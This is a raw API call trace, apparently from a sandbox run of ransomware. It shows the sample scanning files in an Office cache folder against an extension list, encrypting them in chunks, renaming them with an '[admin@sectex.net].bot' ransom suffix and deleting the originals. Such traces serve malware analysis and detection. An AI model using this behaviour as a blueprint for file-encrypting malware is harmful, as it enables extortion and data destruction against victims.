	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString=".jpg") returned 4
	[0049.614] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString=".doc") returned 4
	[0049.614] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0049.614] lstrlenW (lpString=".docx") returned 5
	[0049.614] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0049.614] lstrlenW (lpString=".pdf") returned 4
	[0049.614] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString=".xls") returned 4
	[0049.615] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0049.615] lstrlenW (lpString=".xlsx") returned 5
	[0049.615] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0049.615] lstrlenW (lpString=".ppt") returned 4
	[0049.615] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0049.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.615] lstrlenW (lpString=".zip") returned 4
	[0049.615] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0049.615] lstrlenW (lpString=".rar") returned 4
	[0049.615] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0049.615] lstrlenW (lpString=".bz2") returned 4
	[0049.615] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0049.615] lstrlenW (lpString=".7z") returned 3
	[0049.615] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0049.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.615] lstrlenW (lpString=".dbf") returned 4
	[0049.615] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0049.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.615] lstrlenW (lpString=".1cd") returned 4
	[0049.615] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0049.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.615] lstrlenW (lpString=".jpg") returned 4
	[0049.615] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0049.615] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0049.615] lstrlenW (lpString="ose.exe") returned 7
	[0049.615] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0049.626] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=174440) returned 1
	[0049.627] CloseHandle (hObject=0x1a8) returned 1
	[0049.633] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020
	[0049.636] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0049.643] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.645] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.646] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0049.651] GetLastError () returned 0x0
	[0049.651] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x2a968, lpOverlapped=0x0) returned 1
	[0049.784] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x2a970, lpOverlapped=0x0) returned 1
	[0049.787] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.787] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0049.787] SetEndOfFile (hFile=0x184) returned 1
	[0049.787] CloseHandle (hObject=0x184) returned 1
	[0049.788] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.788] SetEndOfFile (hFile=0x1a8) returned 1
	[0049.790] CloseHandle (hObject=0x1a8) returned 1
	[0049.790] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0049.790] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1
	[0049.790] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.790] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.790] lstrlenW (lpString=".doc") returned 4
	[0049.790] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0049.790] lstrlenW (lpString=".docx") returned 5
	[0049.790] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0049.790] lstrlenW (lpString=".pdf") returned 4
	[0049.790] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0049.790] lstrlenW (lpString=".xls") returned 4
	[0049.790] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0049.790] lstrlenW (lpString=".xlsx") returned 5
	[0049.790] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0049.790] lstrlenW (lpString=".ppt") returned 4
	[0049.790] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0049.790] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.790] lstrlenW (lpString=".zip") returned 4
	[0049.791] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString=".rar") returned 4
	[0049.791] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString=".bz2") returned 4
	[0049.791] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0049.791] lstrlenW (lpString=".7z") returned 3
	[0049.791] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString=".dbf") returned 4
	[0049.791] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString=".1cd") returned 4
	[0049.791] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString=".jpg") returned 4
	[0049.791] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString=".doc") returned 4
	[0049.791] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0049.791] lstrlenW (lpString=".docx") returned 5
	[0049.791] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0049.791] lstrlenW (lpString=".pdf") returned 4
	[0049.791] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString=".xls") returned 4
	[0049.791] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString=".xlsx") returned 5
	[0049.791] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0049.791] lstrlenW (lpString=".ppt") returned 4
	[0049.791] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0049.791] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.791] lstrlenW (lpString=".zip") returned 4
	[0049.791] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0049.792] lstrlenW (lpString=".rar") returned 4
	[0049.792] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0049.792] lstrlenW (lpString=".bz2") returned 4
	[0049.792] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0049.792] lstrlenW (lpString=".7z") returned 3
	[0049.792] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0049.792] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.792] lstrlenW (lpString=".dbf") returned 4
	[0049.792] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0049.792] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.792] lstrlenW (lpString=".1cd") returned 4
	[0049.792] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0049.792] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0049.792] lstrlenW (lpString=".jpg") returned 4
	[0049.792] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0049.792] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0049.792] lstrlenW (lpString="osetup.dll") returned 10
	[0049.792] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0049.792] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=7378792) returned 1
	[0049.792] CloseHandle (hObject=0x1a8) returned 1
	[0049.793] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020
	[0049.793] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.793] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0049.793] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0049.793] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0049.794] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.794] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.161] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.161] ReadFile (in: hFile=0x1a8, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.164] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0050.164] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.164] ReadFile (in: hFile=0x1a8, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.185] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.185] WriteFile (in: hFile=0x1a8, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0050.199] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.199] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xbb10048
	[0050.203] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.203] WriteFile (in: hFile=0x1a8, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.204] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.204] WriteFile (in: hFile=0x1a8, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.206] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.206] WriteFile (in: hFile=0x1a8, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.377] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb10048 | out: hHeap=0x7d60000) returned 1
	[0050.388] CloseHandle (hObject=0x1a8) returned 1
	[0050.440] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.468] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.471] lstrlenW (lpString=".doc") returned 4
	[0050.473] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0050.477] lstrlenW (lpString=".docx") returned 5
	[0050.477] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0050.480] lstrlenW (lpString=".pdf") returned 4
	[0050.483] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0050.487] lstrlenW (lpString=".xls") returned 4
	[0050.487] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0050.488] lstrlenW (lpString=".xlsx") returned 5
	[0050.496] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0050.497] lstrlenW (lpString=".ppt") returned 4
	[0050.501] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0050.501] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString=".zip") returned 4
	[0050.505] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0050.505] lstrlenW (lpString=".rar") returned 4
	[0050.505] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0050.505] lstrlenW (lpString=".bz2") returned 4
	[0050.505] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0050.505] lstrlenW (lpString=".7z") returned 3
	[0050.505] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0050.505] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString=".dbf") returned 4
	[0050.505] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0050.505] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString=".1cd") returned 4
	[0050.505] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0050.505] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString=".jpg") returned 4
	[0050.505] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0050.505] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.505] lstrlenW (lpString=".doc") returned 4
	[0050.505] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0050.505] lstrlenW (lpString=".docx") returned 5
	[0050.506] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0050.506] lstrlenW (lpString=".pdf") returned 4
	[0050.506] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0050.506] lstrlenW (lpString=".xls") returned 4
	[0050.506] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0050.506] lstrlenW (lpString=".xlsx") returned 5
	[0050.506] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0050.506] lstrlenW (lpString=".ppt") returned 4
	[0050.506] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0050.506] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.506] lstrlenW (lpString=".zip") returned 4
	[0050.506] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0050.506] lstrlenW (lpString=".rar") returned 4
	[0050.506] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0050.506] lstrlenW (lpString=".bz2") returned 4
	[0050.506] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0050.506] lstrlenW (lpString=".7z") returned 3
	[0050.506] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0050.506] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.506] lstrlenW (lpString=".dbf") returned 4
	[0050.506] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0050.506] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.506] lstrlenW (lpString=".1cd") returned 4
	[0050.506] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0050.506] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0050.506] lstrlenW (lpString=".jpg") returned 4
	[0050.506] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0050.506] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0050.506] lstrlenW (lpString="VisiorWW.cab") returned 12
	[0050.507] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.507] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=195011319) returned 1
	[0050.507] CloseHandle (hObject=0x184) returned 1
	[0050.507] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020
	[0050.507] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.507] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0050.508] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.508] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0050.508] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.508] ReadFile (in: hFile=0x184, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.517] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.517] ReadFile (in: hFile=0x184, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.521] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0050.521] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.521] ReadFile (in: hFile=0x184, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.761] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
